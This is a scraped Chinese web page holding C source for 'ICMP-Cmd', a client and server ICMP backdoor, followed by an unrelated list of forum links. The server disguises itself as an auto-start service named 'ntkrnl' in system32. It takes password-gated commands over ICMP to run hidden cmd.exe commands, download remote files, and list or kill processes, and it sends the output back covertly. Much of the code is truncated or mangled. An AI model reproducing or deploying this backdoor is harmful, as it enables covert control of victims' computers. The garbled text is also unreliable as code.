unsigned short frag_and_ //3位标志位
//8位生存光阴 TTL
//8位协议 (TCP, UDP 或其他)
uns //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
typedef struct _ihdr
BYTE i_//8位类型
BYTE i_ //8位代码
USHORT i_//16位校验和
USHORT i_//识别号(一般用进程号作为识别号)
USHORT i_//报文序列号
ULONG//光阴截
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 2000
char arg[1450];
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))
void fill_icmp_data(char *, int);
USHORT checksum(USHORT *, int);
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void help(void);
void usage(char * prog);
int main(int argc, char *argv[])
char *ICMP_DEST_IP; //目标主机的IP
if(argc!=2)
usage(argv[0]);
ICMP_DEST_IP=argv[1];//取得目标主机IP
WSADATA wsaD
SOCKET sockR
struct sockaddr_in dest,
int fromlen=sizeof(from);
char *icmp_
if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
fprintf(stderr, "WSAStartup failed: %dn", GetLastError());
ExitProcess(STATUS_FAILED);
sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout=1000;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));
timeout=4000;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));
memset(&dest,0,sizeof(dest));
dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
dest.sin_family=AF_INET;
usage(argv[0]);
printf("ICMP-CMD&");
fgets(SendMsg,1024,stdin);//取得命令行,保存在SendMsg数组中
if(!strcmp(SendMsg,"Qn")||!strcmp(SendMsg,"qn"))ExitProcess(0);
if(!strcmp(SendMsg,"n"))
if(!strcmp(SendMsg,"Hn")||!strcmp(SendMsg,"hn")){help();}
if(!memcmp(SendMsg,"http://",7))
if(!strstr(SendMsg,"-")){printf("nFileName Error. Use "-FileName"n");}
datasize=strlen(SendMsg);
datasize+=sizeof(IcmpHeader);
printf("ICMP packet size is %d",datasize);
icmp_data= (char*)xmalloc(MAX_PACKET);
recvbuf= (char *)xmalloc(MAX_PACKET);
memset(icmp_data,0, MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
((IcmpHeader *)icmp_data)-&i_cksum=0;
((IcmpHeader *)icmp_data)-&i_cksum=checksum((USHORT *)icmp_data, datasize);
int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));
if (bwrote == SOCKET_ERROR)
if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed outn");
fprintf(stderr,"sendto failed: %dn",WSAGetLastError());
if (bwrote&datasize ) {//没有把所有的数据发送出去,也出错了。
printf("nSend Packet to %s Success!n",argv[1]);
DWORD start = GetTickCount();
if((GetTickCount() - start) &= 1000)
memset(recvbuf,0,MAX_PACKET);
int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);
if(bread == SOCKET_ERROR)
if(WSAGetLastError() == WSAETIMEDOUT)
printf("timed outn");
fprintf(stderr, "recvfrom failed: %dn", WSAGetLastError());
decode_resp(recvbuf, bread, &from);
}//end for
}//end try
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
USHORT checksum(USHORT *buffer, int size)
unsigned long cksum=0;
while(size & 1)
cksum+=*buffer++;
size-=sizeof(USHORT);
cksum+=*(UCHAR *)
cksum=(cksum && 16) + (cksum & 0xffff);
cksum+=(cksum && 16);
return(USHORT) (~cksum);
void fill_icmp_data(char *icmp_data, int datasize)
IcmpHeader *icmp_
icmp_hdr= (IcmpHeader *)icmp_
icmp_hdr-&i_type=0;
icmp_hdr-&i_code=0;
icmp_hdr-&i_id=(USHORT)GetCurrentProcessId();
icmp_hdr-×tamp =GetTickCount();
icmp_hdr-&i_seq=1234;
datapart=icmp_data + sizeof(IcmpHeader);
memcpy(datapart,SendMsg,sizeof(SendMsg));
void usage(char * prog)
printf("tt=====Welcome to ======n");
printf("n");
printf("tt---[ ICMP-Cmd v1.0 beta, by gxisone
printf("tt---[ E-mail:
printf("tt---[
printf("ttusage: %s RemoteIPn",prog);
printf("ttCtrl+C or Q/q to Quite
H/h for helpn");
void decode_resp(char *buf, int bytes,struct sockaddr_in *from)
memset(arg,0,sizeof(arg));
IpHeader *
IcmpHeader *
iphdr = (IpHeader *)
iphdrlen = iphdr-&h_len * 4 ;
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr-&i_seq==4321)//密码正确则输出数据段
printf("%d bytes from %s:",bytes, inet_ntoa(from-&sin_addr));
printf(" IcmpType %d",icmphdr-&i_type);
printf(" IcmpCode %d",icmphdr-&i_code);
printf("n");
memcpy(arg,buf+iphdrlen+12,1450);
printf("%s",arg);
else printf("Other ICMP Packets!n");
void help(void)
printf("n");
printf("[ -admin.exe]
(Download Files. Parth is \system32)n");
printf("[pslist]
(List the Process)n");
printf("[pskill ID]
(Kill the Process)n");
printf("Command
(run the command)n");
printf("n");
}服务端如下
#include &winsock2.h&
#include &stdio.h&
#include &urlmon.h&
#include &tlhelp32.h&
#include "stdafx.h"
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")
#define ICMP_PASSWORD 1234
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 6500
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))
/* The IP header */
typedef struct iphdr {
unsigned int h_len:4; //4位首部长度
unsigned int version:4; //IP版本号,4表示IPV4
//8位服务类型TOS
unsigned short total_ //16位总长度(字节)
//16位标识
unsigned short frag_and_ //3位标志位
//8位生存光阴 TTL
//8位协议 (TCP, UDP 或其他)
uns //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
//定义ICMP首部
typedef struct _ihdr
BYTE i_ //8位类型
BYTE i_ //8位代码
USHORT i_ //16位校验和
USHORT i_ //识别号(一般用进程号作为识别号)
USHORT i_ //报文序列号
ULONG //光阴戳
char arg[256];
char buffer[2048] = {0};//管道输出的数据
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void fill_icmp_data(char * icmp_data);
void pslist(void);
BOOL killps(DWORD id);//杀进程函数
void send(void);
char *ICMP_DEST_IP;
USHORT checksum(USHORT *buffer, int size);
SERVICE_STATUS
SERVICE_STATUS_HANDLE ServiceStatusH
WINAPI ICMP_CmdStart(DWORD,LPTSTR *);
WINAPI CmdControl(DWORD);
DWORD WINAPI CmdService(LPVOID);
InstallCmdService(void);
RemoveCmdService(void);
usage(char *par);
int main(int argc,char *argv[])
SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}};
if(argc==2)
if(!stricmp(argv[1],"-install"))
usage(argv[0]);
InstallCmdService();
else if(!stricmp(argv[1],"-remove"))
usage(argv[0]);
RemoveCmdService();
else usage(argv[0]);
else usage(argv[0]);
StartServiceCtrlDispatcher(DispatchTable);
void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
ServiceStatus.dwServiceType
= SERVICE_WIN32;
ServiceStatus.dwCurrentState
= SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted
= SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode
ServiceStatus.dwCheckPoint
ServiceStatus.dwWaitHint
ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl);
if(ServiceStatusHandle==0)
OutputDebugString("RegisterServiceCtrlHandler Error !n");
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint
ServiceStatus.dwWaitHint
if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
OutputDebugString("SetServiceStatus in CmdStart Error !n");
hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
if(hThread==NULL)
OutputDebugString("CreateThread in CmdStart Error !n");
void WINAPI CmdControl(DWORD dwCode)
switch(dwCode)
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
case SERVICE_CONTROL_STOP:
WaitForSingleObject(hMutex,INFINITE);
ServiceStatus.dwCurrentState
= SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint
ServiceStatus.dwWaitHint
if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
OutputDebugString("SetServiceStatus in CmdControl in Switch Error !n");
ReleaseMutex(hMutex);
CloseHandle(hMutex);
case SERVICE_CONTROL_INTERROGATE:
if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
OutputDebugString("SetServiceStatus in CmdControl out Switch Error !n");
DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数,把你的代码写在这里就可以成为服务
char *icmp_
int bread,datasize,
SOCKET sockRaw = (SOCKET)NULL;
WSADATA wsaD
struct sockaddr_in dest,
int fromlen = sizeof(from);
int timeout = 2000;
if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0)
printf("WSAStartup failed: %sn",retval);
ExitProcess(STATUS_FAILED);
sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED);
if (sockRaw == INVALID_SOCKET)
printf("WSASocket() failed: %sn",WSAGetLastError());
ExitProcess(STATUS_FAILED);
bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));
if(bread == SOCKET_ERROR) __
memset(&dest,0,sizeof(dest));
dest.sin_family = AF_INET;
datasize=0;
datasize += sizeof(IcmpHeader);
icmp_data =(char*)xmalloc(MAX_PACKET);
recvbuf = (char*)xmalloc(MAX_PACKET);
if (!icmp_data) {
//fprintf(stderr,"HeapAlloc failed %dn",GetLastError());
memset(icmp_data,0,MAX_PACKET);
bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest));
bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen);
if (bread == SOCKET_ERROR)
if (WSAGetLastError() == WSAETIMEDOUT)
decode_resp(recvbuf,bread,&from);
Sleep(200);
memset(recvbuf,0,sizeof(recvbuf));
__finally {
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
void InstallCmdService(void)
lpCurrentPath[MAX_PATH];
lpImagePath[MAX_PATH];
WIN32_FIND_DATA
SERVICE_STATUS
InstallServiceS
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"ntkrnl.exe");
lpHostName=NULL;
printf("Transmitting File ... ");
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
dwErrorCode=GetLastError();
if(dwErrorCode==5)
printf("Failure ... Access is Denied !n");
printf("Failure !n");
printf("Success !n");
printf("already Exists !n");
FindClose(hSearch);
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if(schSCManager==NULL)
printf("Open Service Control Manager Database Failure !n");
printf("Creating Service .... ");
schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL);
if(schService==NULL)
dwErrorCode=GetLastError();
if(dwErrorCode!=ERROR_SERVICE_EXISTS)
printf("Failure !n");
CloseServiceHandle(schSCManager);
printf("already Exists !n");
schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
if(schService==NULL)
printf("Opening Service .... Failure !n");
CloseServiceHandle(schSCManager);
printf("Success !n");
printf("Starting Service .... ");
if(StartService(schService,0,NULL)==0)
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
printf("already Running !n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
printf("Pending ... ");
while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)
if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
Sleep(100);
if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
printf("Failure !n");
printf("Success !n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
void RemoveCmdService(void)
lpImagePath[MAX_PATH];
WIN32_FIND_DATA
SERVICE_STATUS
RemoveServiceS
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"ntkrnl.exe");
lpHostName=NULL;
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if(schSCManager==NULL)
printf("Opening SCM ......... ");
dwErrorCode=GetLastError();
if(dwErrorCode!=5)
printf("Failure !n");
printf("Failuer ... Access is Denied !n");
schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS);
if(schService==NULL)
printf("Opening Service ..... ");
dwErrorCode=GetLastError();
if(dwErrorCode==1060)
printf("no Exists !n");
printf("Failure !n");
CloseServiceHandle(schSCManager);
printf("Stopping Service .... ");
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
printf("already Stopped !n");
printf("Pending ... ");
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
printf("Success !n");
printf("Failure !n");
printf("Failure !n");
printf("Query Failure !n");
printf("Removing Service .... ");
if(DeleteService(schService)==0)
printf("Failure !n");
printf("Success !n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
printf("Removing File ....... ");
Sleep(1500);
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
printf("no Exists !n");
if(DeleteFile(lpImagePath)==0)
printf("Failure !n");
printf("Success !n");
FindClose(hSearch);
void decode_resp(char *buf, int bytes,struct sockaddr_in *from)
IpHeader *
IcmpHeader *
iphdr = (IpHeader *)
iphdrlen = iphdr-&h_len * 4 ;
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr-&i_seq==ICMP_PASSWORD)//密码正确则输出数据段
ICMP_DEST_IP=inet_ntoa(from-&sin_addr);//取得ICMP包的源地址
memcpy(arg,buf+iphdrlen+12,256);
if (!memcmp(arg,"pskill",6))
killps(atoi(strstr(arg," ")));
memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!"));
else if (!memcmp(arg,"pslist",6)){pslist();send();}
else if (!strcmp(arg,"removen"))
RemoveCmdService();
memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));
////////////************
*************
else if (!memcmp(arg,"http://",7))
if(char *FileName=strstr(arg,"-"))
char url[200];//保存的数组
memset(url,0,200);
memcpy(url,arg,int(FileName-arg-1));
char fname[MAX_PATH];
GetSystemDirectory(fname,MAX_PATH);
FileName++;
strcat(fname,"");
strcat(fname,FileName);
*strstr(fname,"n")=NULL;
HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
memset(buffer,0,sizeof(buffer));
if(hRet==S_OK) memcpy(buffer,"Download OK!n",sizeof("Download OKn"));
memcpy(buffer,"Download Failure!n",sizeof("Download Failure!n"));
//*******************************************
SECURITY_ATTRIBUTES//创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hW
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0))
printf("Error On CreatePipe()");
STARTUPINFO
PROCESS_INFORMATION
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError = hW
si.hStdOutput = hW
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
char cmdline[270];
GetSystemDirectory(cmdline,MAX_PATH+1);
strcat(cmdline,"cmd.exe /c");
strcat(cmdline,arg);
if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
printf("Error on CreateProcess()");
CloseHandle(hWrite);
DWORD bytesR
if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))
Sleep(200);
//printf("%s",buffer);
/////////////////////////////////////////////
//发送输出数据
////////////////////////////////////////////////
//else printf("Other ICMP Packets!n");
USHORT checksum(USHORT *buffer, int size)
unsigned long cksum=0;
while(size &1)
cksum+=*buffer++;
size -=sizeof(USHORT);
if(size ) {
cksum += *(UCHAR*)
cksum = (cksum && 16) + (cksum & 0xffff);
cksum += (cksum &&16);
return (USHORT)(~cksum);
void fill_icmp_data(char * icmp_data)
IcmpHeader *icmp_
icmp_hdr = (IcmpHeader*)icmp_
icmp_hdr-&i_type = 0;
icmp_hdr-&i_code = 0;
icmp_hdr-&i_id = (USHORT) GetCurrentProcessId();
icmp_hdr-&i_cksum = 0;
icmp_hdr-&i_seq =4321;
icmp_hdr-×tamp = GetTickCount(); //设置光阴戳
datapart = icmp_data + sizeof(IcmpHeader);
memcpy(datapart,buffer,strlen(buffer));
//for(int i=0;i&sizeof(buffer);i++) datapart[i]=buffer[i];
usage(char *par)
printf("tt=====Welcome to ======n");
printf("n");
printf("tt---[ ICMP-Cmd v1.0 beta, by gxisone
printf("tt---[ E-mail:
printf("tt---[
printf("n");
printf("ttUsage: %s -install (to install service)n",par);
printf("tt
%s -remove (to remove service)n",par);
printf("n");
void send(void)
WSADATA wsaD
SOCKET sockRaw = (SOCKET)NULL;
struct sockaddr_
int bread,datasize,retval,
int timeout = 1000;
char *icmp_
if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED);
if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))
==INVALID_SOCKET) ExitProcess(STATUS_FAILED);
if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __
//设置发送超时
memset(&dest,0,sizeof(dest));
dest.sin_family = AF_INET;
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
datasize=strlen(buffer);
datasize+=sizeof(IcmpHeader);
icmp_data=(char*)xmalloc(MAX_PACKET);
if(!icmp_data) __
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data); //填充ICMP报文
((IcmpHeader*)icmp_data)-&i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和
bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文
if (bwrote == SOCKET_ERROR)
//if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed outn");
//printf("sendto failed:"&&WSAGetLastError()&&
//printf("Send Packet to %s Success!n"&&ICMP_DEST_IP&&
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
memset(buffer,0,sizeof(buffer));
Sleep(200);
void pslist(void)
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32= {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
printf("nCreateToolhelp32Snapshot() failed:%d",GetLastError());
pe32.dwSize = sizeof(PROCESSENTRY32);
printf("nProcessName ProcessID");
if (Process32First(hProcessSnap, &pe32))
char a[5];
strcat(buffer,pe32.szExeFile);
strcat(buffer,"tt");
itoa(pe32.th32ProcessID,a,10);
strcat(buffer,a);
strcat(buffer,"n");
//printf("n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
while (Process32Next(hProcessSnap, &pe32));
printf("nProcess32Firstt() failed:%d",GetLastError());
CloseHandle (hProcessSnap);
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限
TOKEN_PRIVILEGES
if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
printf("nLookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid =
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS)
printf("AdjustTokenPrivileges failed: %un", GetLastError() );
return FALSE;
return TRUE;
////////////////////////////////////////////////////////////////////////////
BOOL killps(DWORD id)//杀进程函数
HANDLE hProcess=NULL,hProcessToken=NULL;
BOOL IsKilled=FALSE,bRet=FALSE;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
printf("nOpen Current Process Token failed:%d",GetLastError());
//printf("nOpen Current Process Token ok!");
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
printf("nSetPrivilege ok!");
if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
printf("nOpen Process %d failed:%d",id,GetLastError());
//printf("nOpen Process %d ok!",id);
if(!TerminateProcess(hProcess,1))
printf("nTerminateProcess failed:%d",GetLastError());
IsKilled=TRUE;
if(hProcessToken!=NULL) CloseHandle(hProcessToken);
if(hProcess!=NULL) CloseHandle(hProcess);
return(IsKilled);
来源:谷普下载}
我要回帖
更多关于 error patch failed 的文章
更多推荐
- ·新疆的地理特色地区文化和中原地区文化互动交融,是如何丰富中华文化的?
- ·三菱plc的上升沿指令是什么 q系列指令非上升沿这个指令怎么理解,求指点
- ·怎么用excel做数据分析图表气泡图 X轴日期 Y轴价格 气泡大小销量?
- ·excelexcel求百分比函数公式计算问题?
- ·龙腾腾龙数据什么背景公司综合优势
- ·热血精灵派好号海桑尼号的船精灵多少集
- ·网吧生死狙击真号和密码好号和密码查询
- ·新天骄9阶技能巨灵之野怎么进入
- ·求败盅lol的lol召唤师关键词词搜索
- ·游戏风云雪研又爸爸回来了风云直播?
- ·请问有 今天开始做男仆cg图的汉化版下载
- ·飞禽走兽鲨鱼机有没有什么小技巧的?
- ·华人策略控股上面的东西正规吗?
- ·在DNF中,dnf7周年纹章什么属性有什么用?
- ·全民大灌篮母亲节礼包礼包我领了有5.1~端午6.1~新手等等礼包再去淘宝买礼包还能用吗
- ·除了Z u o爱是兴趣、、、、和英雄联盟官方助手u游戏!什么都不是兴趣!你没钱就什么也不兴趣
- ·974时光能倒流吗621吗
- ·三国志曹操传兵种升级三国战魂一天能升几级
- ·为什么全民斩仙激活码手机版安装不了?
- ·为什么玩英雄联盟选完大区消失英雄进入游戏时总说 已断开连接
- ·联盟进去的时候出现error find sendmsg failed with error 1什么意思
- ·龙之谷宠物饱食度人形宠物是永久的吗,饲料怎么得,没有饲料宠物能出站吗?
- ·谁有部落冲突有电脑版吗编辑器?
- ·灭魂辅助帐号被锁定上坡辅助是什么意思情况
- ·历史的天空起云怎么杀2015 怎么杀兀突骨啊
- ·本期探宝器平台的"烙印殿堂"活动中,兑换稀有品质的烙印需要多少个对应的烙印
- ·地下城与勇士直升8585级的传承重甲多少金币一件
- ·神偷鲍勃下载的攻略谁有,就是6112小游戏上面的那个游戏
- ·炫舞里的水映尘世的炫舞情侣装搭配
- ·金枝玉叶 雅乐之舞舞的红叶会变绿吗
- ·有一款梦幻西游手游暴击几率公主为救父皇穿越到别的星系去了 其中可以买的衣服有 隐身衣 遇怪几率增加的衣
- ·这个配置的电脑玩英雄联盟要什么配置卡不卡?
- ·风云三国怎么拜师赤兔马怎么得
- ·谁有4399生死狙击游戏好号的号?能给我一个吗?
- ·为什么陈子豪解说穿越火线视频陈子豪时买英雄级武器点取消就有了
- ·怎样在qq飞车休闲区卡骑宠套装再买
